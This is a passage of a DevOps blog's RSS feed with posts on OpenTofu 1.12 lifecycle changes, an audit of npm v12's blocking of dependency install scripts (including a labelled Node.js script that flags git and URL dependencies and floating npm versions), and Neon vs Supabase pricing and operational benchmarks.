        <a href="#h2-prevent_destroy-is-dynamic-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          prevent_destroy is dynamic now
        </a>
        </h2><p>Since the beginning, <code>prevent_destroy</code> demanded a hardcoded literal. The classic consequence: shared modules either shipped two variants (one strict, one not) or left protection off and hoped. As of 1.12:</p>
<pre><code class="hljs language-hcl">lifecycle {
  prevent_destroy = var.environment == <span class="hljs-string">&quot;production&quot;</span>
}
</code></pre><p>The argument can reference symbols in the same module, so a single database module can refuse destruction in production and allow it in ephemeral environments, decided by the caller. Terraform still requires the static literal, so this is also one of the clearest divergence points between the two projects to date: not a new block, but a restriction removed from a fifteen-year-old one.</p>
<p>Worth knowing before you parameterize everything: protection that depends on a variable is protection that can be turned off by changing an input, possibly far from the module, possibly by automation. For the resources where <code>prevent_destroy</code> was doing real work as a last line of defense, a hardcoded <code>true</code> is still the stronger statement. The dynamic form is for the wide middle ground where the old static rule forced you to choose between duplicate modules and no guardrail at all.</p>
<h2 id="h2-the-smaller-changes-that-touch-your-ci-anyway" class="group relative scroll-mt-24">
        <a href="#h2-the-smaller-changes-that-touch-your-ci-anyway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The smaller changes that touch your CI anyway
        </a>
        </h2><p><strong>Provider checksums complete themselves.</strong> <code>tofu init</code> now writes a full set of checksums for all platforms into the dependency lock file, using both <code>zh:</code> and <code>h1:</code> hashes, without the separate <code>tofu providers lock</code> step that teams bolted into their workflows (and that anyone with a mixed macOS/Linux team learned the hard way). Two operational notes: the first <code>init</code> after upgrading rewrites your lock file with the added <code>h1:</code> hashes, so expect a one-time noisy diff and merge it deliberately; and if a renovate-style bot regenerates lock files, its next PR will carry that churn too.</p>
<p><strong><code>-json-into=FILENAME</code></strong> gives you machine-readable output and human-readable output from the same run: JSON streams to the file (named pipes work, so <code>/dev/fd/N</code> tricks are on the table), while the terminal keeps the normal rendering. The previous choice was one or the other, which is why so many pipelines run plan twice or pipe JSON through a prettifier. One run, both audiences.</p>
<p><strong>Deprecations:</strong> WinRM support for provisioners is deprecated with removal planned for 1.13 (the few teams still bootstrapping Windows hosts through provisioners should start the SSH or image-baking migration now), and official 32-bit builds (<code>386</code>, <code>arm</code>) begin phasing out with warnings expected in 1.13.</p>
<h2 id="h2-where-this-leaves-the-terraform-comparison" class="group relative scroll-mt-24">
        <a href="#h2-where-this-leaves-the-terraform-comparison" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where this leaves the Terraform comparison
        </a>
        </h2><p>We keep a longer <a href="https://devops-daily.com/posts/opentofu-2026-switch-from-terraform">OpenTofu vs Terraform migration guide</a> that covers licensing and ecosystem, so just the delta here: 1.11 brought ephemeral values and the <code>enabled</code> meta-argument, and 1.12 adds config-driven forgetting, dynamic destroy protection, and lock files that maintain themselves. The pattern across the last two releases is consistent: OpenTofu is spending its development budget on the unglamorous state-and-lifecycle operations that fill real teams&#39; runbooks, and the fork stopped being a drop-in clone a while ago.</p>
<p>If you adopt one thing from 1.12 this quarter, make it <code>destroy = false</code> on the resources your team currently protects with tribal knowledge and a pinned Slack message. State surgery through code review beats state surgery through terminal history every time someone new joins the on-call rotation.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[npm v12 Will Stop Running Install Scripts. We Audited Our Repos to See What Actually Breaks]]></title>
      <link>https://devops-daily.com/posts/npm-v12-install-scripts-audit</link>
      <description><![CDATA[Starting with npm v12 (estimated July 2026), dependency install scripts will not run unless you allowlist them. We ran the new audit tooling on our own production repos: 65 packages flagged, 4 that matter, and a surprising amount of nothing breaking.]]></description>
      <pubDate>Fri, 12 Jun 2026 14:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/npm-v12-install-scripts-audit</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[npm]]></category><category><![CDATA[supply-chain]]></category><category><![CDATA[security]]></category><category><![CDATA[ci-cd]]></category><category><![CDATA[nodejs]]></category>
      <content:encoded><![CDATA[<p>On June 9, GitHub <a href="https://github.blog/changelog/2026-06-09-upcoming-breaking-changes-for-npm-v12/">announced the breaking changes coming in npm v12</a>, estimated to ship in July 2026. The headline change: <code>npm install</code> will no longer execute <code>preinstall</code>, <code>install</code>, or <code>postinstall</code> scripts from your dependencies unless you have explicitly approved them. Not as an option you can turn on. As the default, for everyone.</p>
<p>If you have followed the npm worm coverage on this site over the past months (<a href="https://devops-daily.com/posts/tanstack-npm-worm-dead-mans-switch">TanStack</a>, <a href="https://devops-daily.com/posts/mini-shai-hulud-pytorch-lightning-supply-chain-attack">PyTorch Lightning&#39;s mini Shai-Hulud</a>, <a href="https://devops-daily.com/posts/axios-supply-chain-attack-what-happened-and-what-to-do">axios</a>, <a href="https://devops-daily.com/posts/antv-npm-shai-hulud-wave-may-2026">the AntV wave</a>), you already know why. Every one of those campaigns used the same beachhead: a script that runs automatically, with your credentials, the moment you install a package. GitHub calls lifecycle scripts the single largest code-execution surface in the npm ecosystem, and after the June 1 Red Hat compromise shipped credential stealers with valid SLSA provenance, the argument for keeping that surface open by default ran out.</p>
<p>So instead of writing about the policy, we did the thing you should do this week: upgraded npm and ran the new audit tooling against our own production repositories. Here is what v12 will actually do to a real Next.js application and a couple of TypeScript tooling repos, including the part where much less breaks than the audit output suggests.</p>
<h2 id="h2-what-changes-exactly" class="group relative scroll-mt-24">
        <a href="#h2-what-changes-exactly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What changes, exactly
        </a>
        </h2><p>Three defaults flip in v12:</p>
<ol>
<li><strong>Dependency lifecycle scripts stop running.</strong> <code>preinstall</code>, <code>install</code>, and <code>postinstall</code> from dependencies are skipped unless the package is on your project&#39;s allowlist. This includes implicit builds: a package with a <code>binding.gyp</code> and no declared install script still gets blocked, because npm runs an implicit <code>node-gyp rebuild</code> for it. <code>prepare</code> scripts from git, file, and link dependencies are covered too.</li>
<li><strong>Git dependencies need <code>--allow-git</code>.</strong> Direct or transitive git dependencies stop resolving without the flag. This closes an ugly hole: a git dependency&#39;s <code>.npmrc</code> could override which git executable npm invokes, which meant code execution even under <code>--ignore-scripts</code>.</li>
<li><strong>Remote URL dependencies need <code>--allow-remote</code>.</strong> Tarballs pulled from HTTPS URLs stop resolving without explicit opt-in. <code>file:</code> and directory dependencies keep their current behavior.</li>
</ol>
<p>Your own project&#39;s scripts still run. If your root <code>package.json</code> has a <code>postinstall</code> that runs <code>patch-package</code>, or a <code>prepare</code> that installs husky hooks, nothing changes for you. The allowlist is about code arriving from the registry, and it lives in your <code>package.json</code>, which means script approvals show up in pull requests and get reviewed like any other change.</p>
<p>All of this is already available as warnings in npm 11.16.0 and later, which is what makes the audit possible before July.</p>
<h2 id="h2-the-audit-65-warnings-4-that-matter" class="group relative scroll-mt-24">
        <a href="#h2-the-audit-65-warnings-4-that-matter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The audit: 65 warnings, 4 that matter
        </a>
        </h2><p>We ran <code>npm approve-scripts --allow-scripts-pending</code> (npm 11.17.0) against this site, a production Next.js application with a fairly typical dependency tree. The output flags 65 packages with lifecycle scripts not yet covered by an allowlist. Out of context, that number reads like a migration project.</p>
<p>It is not, and the breakdown shows why:</p>
<table>
<caption>65 packages flagged in our Next.js repo, by script type. Output of npm approve-scripts --allow-scripts-pending on a production Next.js app, June 2026.</caption>
<thead><tr><th>Script type</th><th>Packages</th><th>Series</th></tr></thead>
<tbody>
<tr><td>prepare (husky, npm run build, ...)</td><td>61</td><td>noise</td></tr>
<tr><td>install (sharp)</td><td>1</td><td>real</td></tr>
<tr><td>postinstall (esbuild x2, unrs-resolver)</td><td>3</td><td>real</td></tr>
</tbody>
</table>
<p>Sixty-one of the sixty-five are <code>prepare</code> scripts: husky hook installation, <code>npm run build</code>, the usual library housekeeping. <code>prepare</code> only executes when you install a package from git, a local file, or a link, never from a normal registry install. Unless you are pinning one of those packages to a git ref, these entries are inert. The audit lists them because it cannot know you will not switch a dependency to a git URL tomorrow, but for triage purposes you can put them at the bottom of the pile.</p>
<p>That leaves four entries that run today on every clean install of this repo: <code>sharp</code> (image processing, used by Next.js image optimization), <code>esbuild</code> twice at different versions, and <code>unrs-resolver</code>. All native code. These are the ones that could break a build in July.</p>
<p>Two smaller repos made the point even more cleanly: our open source <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">benchmark harness</a> and its dashboard each flagged exactly one package. Both times it was esbuild.</p>
<h2 id="h2-the-plot-twist-we-denied-them-and-nothing-broke" class="group relative scroll-mt-24">
        <a href="#h2-the-plot-twist-we-denied-them-and-nothing-broke" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The plot twist: we denied them and nothing broke
        </a>
        </h2><p>Here is the part worth the price of admission. We installed <code>sharp</code> and <code>esbuild</code> into a clean project with scripts disabled, then exercised both:</p>
<ul>
<li><code>sharp</code> created and encoded an image without its <code>install</code> script ever running.</li>
<li><code>esbuild</code> transformed TypeScript without its <code>postinstall</code>.</li>
</ul>
<p>No failures, no missing binaries. The reason: both packages migrated their native binary distribution to <code>optionalDependencies</code> (<code>@img/sharp-linux-arm64</code>, <code>@esbuild/linux-arm64</code>, and their platform siblings), which are plain packages that install without any script execution. The lifecycle scripts that the audit flags are validation and fallback paths for platforms without a prebuilt binary, not the primary delivery mechanism.</p>
<p>This is the quiet story behind npm v12: the ecosystem&#39;s most depended-on native packages already left install scripts behind, in large part because the worm era made every install-time hook a liability. The default flip in July is less a demolition and more the locking of a door most serious packages already stopped using.</p>
<h2 id="h2-what-will-actually-break" class="group relative scroll-mt-24">
        <a href="#h2-what-will-actually-break" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What will actually break
        </a>
        </h2><p>That does not make the change free. The breakage concentrates in specific places, and they are worth checking deliberately:</p>
<ul>
<li><strong>Long-tail native modules built with node-gyp.</strong> Anything that compiles C++ on install and has not moved to prebuilt binaries stops working until allowlisted, including packages with only an implicit <code>binding.gyp</code> build. Older database drivers, hardware bindings, and that one image library from 2019 live here.</li>
<li><strong>Downloaders.</strong> Packages whose <code>postinstall</code> fetches something big: Puppeteer and Playwright pulling browsers, Cypress pulling its binary. Denied scripts mean the tool installs but fails at runtime with a missing executable, which is a worse failure mode than failing at install.</li>
<li><strong>Git and URL dependencies.</strong> Any <code>&quot;some-fork&quot;: &quot;github:org/repo#branch&quot;</code> in your tree needs <code>--allow-git</code> in every CI job and Dockerfile that installs it. Private tarball URLs need <code>--allow-remote</code>. These fail loudly at resolve time, so you will notice, but you will notice in the middle of an incident if your first v12 install happens during one.</li>
<li><strong>CI images that float npm versions.</strong> If your Dockerfile does <code>npm install -g npm@latest</code> or your CI uses a <code>node:latest</code> style tag, v12 arrives on its schedule, not yours.</li>
</ul>
<h2 id="h2-the-checklist" class="group relative scroll-mt-24">
        <a href="#h2-the-checklist" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The checklist
        </a>
        </h2><p>The whole audit took us under fifteen minutes for three repos. Doing it now means July is a non-event:</p>
<ol>
<li>Upgrade to npm 11.16.0 or later somewhere representative (a dev machine is fine, CI is better).</li>
<li>Run <code>npm approve-scripts --allow-scripts-pending</code> in each repo. Ignore the <code>prepare</code> entries from registry packages on the first pass.</li>
<li>For each real <code>install</code>/<code>postinstall</code> entry, decide: approve it with <code>npm approve-scripts &lt;pkg&gt;</code>, or test whether the package works without it (as with sharp and esbuild above, the answer is increasingly yes) and deny it with <code>npm deny-scripts &lt;pkg&gt;</code>.</li>
<li>Commit the resulting allowlist in <code>package.json</code>. From now on, a new dependency wanting script execution shows up in code review instead of executing silently.</li>
<li>Grep your Dockerfiles and CI for git and URL dependencies, and add the flags where genuinely needed.</li>
<li>Pin your npm major version in CI images, and schedule the v12 upgrade like any other dependency upgrade instead of receiving it as a surprise.</li>
</ol>
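<p>Steps 5 and 6 can be scripted. The following is an added example, not code from the original post or from npm: a Node.js script that classifies direct <code>package.json</code> specifiers as git or remote-URL dependencies (mapped to the <code>--allow-git</code> and <code>--allow-remote</code> flags named above) and flags floating <code>node</code> image tags and unpinned global npm upgrades in Dockerfile or CI text. The function names, the matching heuristics and the sample inputs are assumptions constructed for illustration.</p>

```javascript
'use strict';
// Added example (not from the original post). All names and heuristics here are assumptions.

const GIT_PREFIXES = ['git+', 'git://', 'github:', 'gitlab:', 'bitbucket:', 'gist:'];
const FLAG_FOR = { git: '--allow-git', remote: '--allow-remote' }; // flags named in the post
const FLOATING = new Set(['latest', 'lts', 'current', 'next']);

// Heuristic: classify one package.json specifier as 'git', 'remote' (URL tarball) or 'other'
// ('other' covers registry ranges and tags, file: paths, npm: aliases, workspace: specs).
function classifySpec(spec) {
  const s = String(spec).trim();
  if (GIT_PREFIXES.some((p) => s.startsWith(p))) return 'git';
  if (/^https?:\/\//i.test(s)) return /\.git(#.*)?$/i.test(s) ? 'git' : 'remote';
  // "org/repo" or "org/repo#ref" shorthand points at a GitHub repository.
  if (/^[A-Za-z0-9_-][A-Za-z0-9_.-]*\/[A-Za-z0-9_.-]+(#.+)?$/.test(s)) return 'git';
  return 'other';
}

// Report every direct dependency that is fetched from git or a remote URL.
function auditManifest(manifestText) {
  const manifest = JSON.parse(manifestText);
  const findings = [];
  for (const section of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(manifest[section] || {})) {
      const kind = classifySpec(spec);
      if (kind !== 'other') findings.push({ section, name, spec, kind, flag: FLAG_FOR[kind] });
    }
  }
  return findings;
}

// Report lines in a Dockerfile or CI file where the node image or npm itself floats.
function auditBuildFile(text) {
  const findings = [];
  text.split(/\r?\n/).forEach((raw, idx) => {
    const line = raw.trim();
    if (line.startsWith('#')) return; // skip comments
    const lineNo = idx + 1;

    // Base image: node with no tag or a moving tag, and no digest pin.
    const from = /^FROM\s+(?:--\S+\s+)*(\S+)/i.exec(line);
    if (from && !from[1].includes('@sha256:')) {
      const m = /(?:^|\/)node(?::(\S+))?$/i.exec(from[1]);
      if (m && (!m[1] || FLOATING.has(m[1].split('-')[0]))) {
        findings.push({ line: lineNo, issue: 'floating-node-image', text: line });
      }
    }

    // Global self-upgrade of npm with no version or a moving dist-tag.
    const tokens = line.replace(/["']/g, ' ').split(/\s+/);
    for (let k = 0; k < tokens.length - 1; k++) {
      if (tokens[k] !== 'npm' || !['install', 'i'].includes(tokens[k + 1])) continue;
      let isGlobal = false;
      let target = null;
      for (let j = k + 2; j < tokens.length && !/^(&&|\|\||;|\|)$/.test(tokens[j]); j++) {
        if (tokens[j] === '-g' || tokens[j] === '--global') isGlobal = true;
        const t = /^npm(?:@(.+))?$/.exec(tokens[j]);
        if (t) target = t[1] || '';
      }
      if (isGlobal && target !== null && (target === '' || FLOATING.has(target))) {
        findings.push({ line: lineNo, issue: 'floating-npm-version', text: line });
      }
    }
  });
  return findings;
}

// Constructed sample inputs (not taken from any real project).
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'constructed-sample',
  dependencies: {
    express: '^4.18.2',
    'some-fork': 'github:org/repo#branch',
    'internal-lib': 'https://artifacts.example.invalid/internal-lib-1.4.0.tgz',
  },
  devDependencies: { 'lint-rules': 'org/lint-rules#v2', local: 'file:../local' },
});

const SAMPLE_DOCKERFILE = [
  'FROM node:latest AS build',
  '# RUN npm install -g npm@latest   (commented out, ignored)',
  'RUN npm install -g npm@latest && npm ci',
  'FROM node:22-alpine',
  'RUN npm i -g npm@11',
].join('\n');

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST), null, 2));
console.log(JSON.stringify(auditBuildFile(SAMPLE_DOCKERFILE), null, 2));
```

<p>The manifest check covers direct dependencies only; transitive git and URL dependencies are recorded in the lockfile and need a separate pass.</p>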
<p>One honest caveat: July 2026 is GitHub&#39;s estimate, and details of partially shipped behavior have moved before (the git restriction landed in 11.10, remote URLs in 11.15, the full allowlist tooling in 11.16). The direction is not in question, though. Install-time code execution from the registry is ending as a default, three years of worms made the case, and the audit that tells you whether you care takes less time than reading this post did.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon vs Supabase Pricing: What the Same App Costs From Launch to Scale]]></title>
      <link>https://devops-daily.com/posts/neon-vs-supabase-scaling-costs</link>
      <description><![CDATA[We priced one application through five growth stages on both platforms using verified June 2026 list prices. The result is three distinct cost regimes, two crossover points, and a surprise: at scale the biggest line item is not the database.]]></description>
      <pubDate>Thu, 11 Jun 2026 18:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-vs-supabase-scaling-costs</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[neon]]></category><category><![CDATA[supabase]]></category><category><![CDATA[databases]]></category><category><![CDATA[pricing]]></category><category><![CDATA[finops]]></category>
      <content:encoded><![CDATA[<p>Pricing pages answer the question &quot;what does a unit cost&quot;. They are conspicuously silent on the question you actually have: &quot;what will my application cost in a year, when it has real users?&quot; The honest answer depends on workload shape, and workload shape changes as you grow, which is why the same two platforms can each be the cheap option at different points in the same product&#39;s life.</p>
<p>This is part three of our Neon vs Supabase series (<a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">free tiers</a>, <a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">operational benchmarks</a>). Instead of benchmarking operations, we built a cost model: one application, five growth stages, priced on Neon Launch and Supabase Pro using list prices we verified against both pricing pages this week. The model is <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">open source in the same repo</a> as the benchmarks (<code>npm run costs</code>), every price carries its source, and you can change the workload assumptions and rerun it for your own product.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>There are <strong>three cost regimes, not one winner</strong>: Neon wins early (scale-to-zero means a quiet app costs almost nothing), Supabase wins the middle (a flat fee beats usage billing once the database runs hot but small), and Neon wins at scale by a wide margin.</li>
<li>The two <strong>crossover points</strong> sit roughly where your app stops sleeping (Supabase becomes competitive) and where your user count passes Supabase&#39;s included 100k monthly active users (Supabase stops being competitive, fast).</li>
<li>The scale-stage surprise: on Supabase, <strong>the database is not the bill</strong>. Metered auth MAU is. Our scale stage prices at $1,213/month on Supabase Pro, of which $975 is MAU overage; the same stage on Neon Launch is $278, because Neon Auth carries no per-MAU meter up to 1M users.</li>
<li>This comparison assumes you use each platform&#39;s bundled auth. If you bring your own auth provider, the picture changes substantially in Supabase&#39;s favor, and we show you where.</li>
</ul>
<h2 id="h2-the-application-and-its-growth" class="group relative scroll-mt-24">
        <a href="#h2-the-application-and-its-growth" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The application and its growth
        </a>
        </h2><p>The model prices one hypothetical B2B SaaS through five stages, with the workload dimensions both platforms bill on: average compute demand, how much of the month the database is actually active, database size, monthly active users on auth, preview branches created by CI, and egress.</p>
<table>
<thead>
<tr>
<th>Stage</th>
<th>Compute (avg)</th>
<th>Active time</th>
<th>DB size</th>
<th>MAU</th>
<th>Branches/mo</th>
<th>Egress</th>
</tr>
</thead>
<tbody><tr>
<td>Launch month</td>
<td>0.25 CU</td>
<td>20%</td>
<td>1 GB</td>
<td>500</td>
<td>10</td>
<td>5 GB</td>
</tr>
<tr>
<td>First customers</td>
<td>0.25 CU</td>
<td>45%</td>
<td>5 GB</td>
<td>5k</td>
<td>30</td>
<td>25 GB</td>
</tr>
<tr>
<td>Product-market fit</td>
<td>0.5 CU</td>
<td>75%</td>
<td>20 GB</td>
<td>30k</td>
<td>60</td>
<td>100 GB</td>
</tr>
<tr>
<td>Growth</td>
<td>1 CU</td>
<td>95%</td>
<td>60 GB</td>
<td>120k</td>
<td>120</td>
<td>400 GB</td>
</tr>
<tr>
<td>Scale</td>
<td>2 CU</td>
<td>100%</td>
<td>200 GB</td>
<td>400k</td>
<td>200</td>
<td>1.5 TB</td>
</tr>
</tbody></table>
<p>Disagree with the assumptions? Good: they are parameters, not conclusions. Clone the repo, edit the scenario, rerun. The shape of the findings survives reasonable changes to the numbers; your exact crossover points will differ.</p>
<h2 id="h2-the-curves" class="group relative scroll-mt-24">
        <a href="#h2-the-curves" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The curves
        </a>
        </h2><div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;line&quot;,&quot;title&quot;:&quot;Monthly cost of the same application as it grows&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;List prices June 2026, verified against both pricing pages. Model and assumptions are open source; rerun with your own workload.&quot;,&quot;x&quot;:[&quot;launch month&quot;,&quot;first customers&quot;,&quot;product-market fit&quot;,&quot;growth&quot;,&quot;scale&quot;],&quot;series&quot;:[{&quot;name&quot;:&quot;Neon (Launch)&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;data&quot;:[5.28,15.23,48.74,119.95,277.76]},{&quot;name&quot;:&quot;Supabase (Pro)&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;data&quot;:[25.54,27.42,32.95,127.94,1213.39]}]}"></div><p><strong>Regime one, the quiet months.</strong> At launch, Neon costs $5 to Supabase&#39;s $26. Nothing clever: Supabase Pro is a $25 flat fee plus always-on compute, while Neon bills compute only when the database is awake, and an early-stage app sleeps most of the month. If you are pre-revenue, this gap is your hosting budget.</p>
<p><strong>Regime two, the flat-fee window.</strong> By product-market fit the picture inverts: Supabase $33, Neon $49. The database now runs three-quarters of the month, so scale-to-zero stops paying, while Supabase&#39;s fixed fee covers a Small instance running around the clock with most usage inside included quotas. This is the regime Supabase&#39;s pricing is designed for, and in it, the design works. The growth stage is nearly a tie ($128 vs $120), which is itself useful information: between roughly 30k and 120k users, price should not be the deciding factor at all; pick on the <a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">operational differences</a> instead.</p>
<p><strong>Regime three, the meters.</strong> At scale the curves split violently: $278 on Neon, $1,213 on Supabase. To see why, look at where the Supabase dollars go:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Where the money goes at the scale stage (Supabase Pro, $1213.39/mo total)&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;The database is not the bill. Metered monthly active users on auth dominate once you pass the included 100k.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Pro base (per org)&quot;,&quot;value&quot;:25,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;compute (medium, 24/7, after $10 credits)&quot;,&quot;value&quot;:50.01,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;storage beyond 8 GB included&quot;,&quot;value&quot;:24,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;MAU beyond 100,000 included&quot;,&quot;value&quot;:975,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;200 preview branches (10h each, no credits…&quot;,&quot;value&quot;:26.88,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;egress beyond 250 GB included&quot;,&quot;value&quot;:112.5,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><h2 id="h2-the-mau-surprise" class="group relative scroll-mt-24">
        <a href="#h2-the-mau-surprise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The MAU surprise
        </a>
        </h2><p>That chart is the article. At 400k monthly active users, the compute (a Medium instance, $50 after credits) and even 200 GB of storage ($24) are rounding errors next to <strong>$975 of MAU overage</strong>: Supabase Auth includes 100k monthly active users on Pro and bills $0.00325 for each one beyond. Auth, the feature that felt free when you started, becomes 80% of the bill precisely when your product succeeds.</p>
<p>Neon&#39;s side has no equivalent meter: Neon Auth (in beta) carries no per-MAU billing up to one million users on the paid plans, so the scale stage is honest compute and storage: $155 + $70 + $53 of always-active database, branches included.</p>
<p>Now the fairness flip, because this cuts both ways: <strong>the comparison above assumes you use the bundled auth.</strong> Plenty of teams run Clerk, Auth0, WorkOS, or their own auth regardless of database, and at 400k MAU those run hundreds to thousands of dollars a month on their own. If you bring your own auth, delete the MAU line from the Supabase column, and the scale stage becomes roughly $238 vs $278: a near-tie that Supabase arguably wins. The platform decision and the auth decision are one decision wearing two coats; make them together.</p>
<h2 id="h2-what-the-model-deliberately-leaves-out" class="group relative scroll-mt-24">
        <a href="#h2-what-the-model-deliberately-leaves-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the model deliberately leaves out
        </a>
        </h2><ul>
<li><strong>The PITR add-on</strong> ($100/month on Supabase per 7-day window): add it if sub-minute recovery is a requirement; part two explains what you get on each platform without it.</li>
<li><strong>Replacement costs for the rest of the bundle</strong>: if you would otherwise pay for storage, realtime, or edge functions separately, Supabase&#39;s flat fee is buying more than a database. Neon announced its own storage and functions in June 2026, but they have not shipped.</li>
<li><strong>Committed-use and enterprise discounts</strong>, support tiers, and the Team/Scale tiers above these plans: that comparison is coming later in this series.</li>
<li><strong>Egress shape</strong>: we model it linearly; a media-heavy product will not be linear, and Supabase&#39;s $0.09/GB beyond 250 GB deserves your own modeling if that is you.</li>
</ul>
<h2 id="h2-how-to-actually-use-this" class="group relative scroll-mt-24">
        <a href="#h2-how-to-actually-use-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to actually use this
        </a>
        </h2><ol>
<li>Find your regime. Mostly-idle side project or pre-launch: Neon by default. Steady small production app, happy inside included quotas: Supabase&#39;s flat fee is genuinely good value. Past 100k MAU on bundled auth: do the math before the bill does it for you.</li>
<li>Watch the crossovers, not the platforms. The first crossover arrives when your database stops sleeping; the second when your user count crosses the included-MAU line. Both are visible in your own metrics months before they hit the invoice.</li>
<li>Decide auth and database together. The single biggest line in this entire analysis is an auth meter on a database platform.</li>
</ol>
<p>Every price in the model links to its source and was verified against both pricing pages in June 2026 (prices change; the <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">repo</a> holds the dated record). Like the benchmarks, the model is open source and contributions are welcome: if a price moved or an assumption looks wrong, open an issue or PR and we will rerun the curves. The <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> carries the measured performance data this series is built on, our <a href="https://devops-daily.com/comparisons/neon-vs-supabase">full Neon vs Supabase comparison</a> lays out the architecture and feature differences side by side, and part four will close the series with something nobody has benchmarked properly yet: what it costs in AI agent tokens to build the same application on each platform.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon vs Supabase in Production: We Benchmarked the Operations That Page You at 3am]]></title>
      <link>https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks</link>
      <description><![CDATA[Two benchmark sessions against Neon and Supabase Pro measured what spec sheets never show: compute resizes cost 39 seconds of real downtime on one platform and zero on the other, read replicas differ by 23x, and branch creation has a tail you should know about.]]></description>
      <pubDate>Thu, 11 Jun 2026 16:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[neon]]></category><category><![CDATA[supabase]]></category><category><![CDATA[databases]]></category><category><![CDATA[serverless]]></category><category><![CDATA[benchmarks]]></category><category><![CDATA[sre]]></category>
      <content:encoded><![CDATA[<p>Free tiers are where you evaluate a database. Paid tiers are where you operate one, and operating means the unglamorous verbs: resize the compute because traffic doubled, add a read replica because the dashboard queries are hurting, branch the database for a preview environment, restore because someone ran the wrong migration. Vendor documentation describes these operations. It rarely tells you how long they take, and it almost never tells you what they cost in downtime.</p>
<p>So we measured them. This is part two of our Neon vs Supabase series (<a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">part one covered the free tiers</a>), now on the plans you would actually run production on: Supabase Pro against the equivalent Neon tier. Same methodology as before: both platforms in AWS eu-central-1, timed from a client VM in the same metro, every operation run repeatedly across two separate benchmark sessions on different days, raw samples committed, and everything reproducible from <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">the open source harness</a> with a <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> tracking every session since.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li><strong>Compute resize is the starkest difference we have ever measured between two managed databases.</strong> Changing compute size on Supabase took 39 seconds of API time and caused 39 seconds of real SQL downtime per change, measured by probing the database every 250ms. The same operation on Neon: 2.4 seconds to apply, zero failed probes.</li>
<li><strong>You also cannot resize Supabase twice in a row</strong>: the platform throttles consecutive compute changes for minutes (&quot;We are still processing addon changes, please try again in 3 minutes&quot;).</li>
<li><strong>Read replicas are an architecture lesson in two numbers</strong>: 8 seconds on Neon (a new compute attaches to existing shared storage) vs 181 seconds on Supabase (a full database clone), with Supabase also requiring Small compute or larger on the primary.</li>
